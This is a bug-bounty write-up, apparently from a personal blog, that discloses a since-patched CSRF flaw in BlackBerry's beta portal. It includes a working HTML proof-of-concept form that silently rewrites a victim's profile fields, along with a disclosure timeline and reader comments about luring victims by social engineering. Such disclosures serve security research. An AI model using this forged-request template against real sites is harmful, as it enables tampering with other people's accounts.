CSRF bug in Blackberry To Update All Users Profile



Hello everyone,

This is my first write-up and i would like to start it with the CSRF vulnerability that I've found recently in Blackberry domain by using this bug i was able to change any user profile information ;)

Introduction:-

Few months back, I had taken presentation on the topic Cross-Site Request Forgery at Null-Mumbai chapter meet, You can find my slides here Its all about CSRF . And also I had taken seminar explaining various ways to bypass CSRF tokens.
Well all this motivated me to research more about CSRF bug and its bypasses techniques.
Then I started digging deep to find these types of bugs



So here my first experience goes...

About BlackBerry Beta Zone : Site says it has 400,000 members and growing!

I started doing my security research on BlackBerry. While I was checking this portal for finding bug I came across the user profile details where they have not set any protection against CSRF.
Which means by using this bug I can able to change all the users profile information.

Now for me it's like having cup of tea :P




Proof Of Concept:-

This attack works by sending a crafted request to victim and victim has to click on the request.
So I crafted forged html request as below.

<html>
  <body>
    <form action="https://beta.webapps.blackberry.com/profiles/update/1301" method="POST">
      <input type="hidden" name="formKey" value="b60252de0a9e6c85fd78c480dc736562aba3c11c9ba5f27d0e4ebe8decc827b9" />
      <input type="hidden" name="formPageId" value="5190" />
      <input type="hidden" name="data&#91;person&#93;&#91;name&#95;first&#93;" value="Hacked_By_Nilesh" />
      <input type="hidden" name="data&#91;person&#93;&#91;name&#95;last&#93;" value="Hackerz are here" />
      <input type="hidden" name="data&#91;location&#93;&#91;city&#93;" value="mumbai" />
      <input type="hidden" name="data&#91;location&#93;&#91;country&#95;id&#93;" value="183" />
      <input type="hidden" name="quest&#95;572" value="1729" />
      <input type="hidden" name="quest&#95;577" value="" />
      <input type="hidden" name="quest&#95;380" value="781" />
      <input type="hidden" name="quest&#95;381" value="790" />
      <input type="hidden" name="check&#95;387&#91;&#93;" value="819" />
      <input type="hidden" name="applybtn" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


BEFORE:- Victim Account Information



AFTER: Victim Account Details changed after clicking on request sent by attacker



So i wrote nice mail to blackberry security team explaining this issue. After reporting my submission, blackberry security team was not able to find my report :(



At-last after exchanging few mails with blackberry security team I got a reply.




I am happy that they patched this bug so quickly and here I got this HOF (Hall Of Fame) :D

Hall Of Fame:- 



Video POC:-

Below is the video POC demonstration of this attack : (Enjoy the music ;))



Time-Line:

Vulnerability timeline:

July 12, 2015 at 5:43  PM : Reported to vendor- Blackberry Team
July 15, 2015 at 1:45 AM : Received initial reply from Blackberry Team
July 30, 2015 at 2:30 AM : Blackberry Team released a quick fix for the vulnerability
Aug 10, 2015 at 6:30 PM : Public responsible disclosure

Share this

Related Posts

Previous
Next Post »

7 comments

Write comments
Anonymous
9 August 2015 at 10:01 delete

Great Finding but how you can update all user profile using single click :P

Reply
avatar
9 August 2015 at 10:20 delete

Hi Thank you....Well Its CSRF bug so in that user interaction is require to successfully execute this attack. So victim has to click on the request sent by attacker and to do this we generally use Social engineering.

Reply
avatar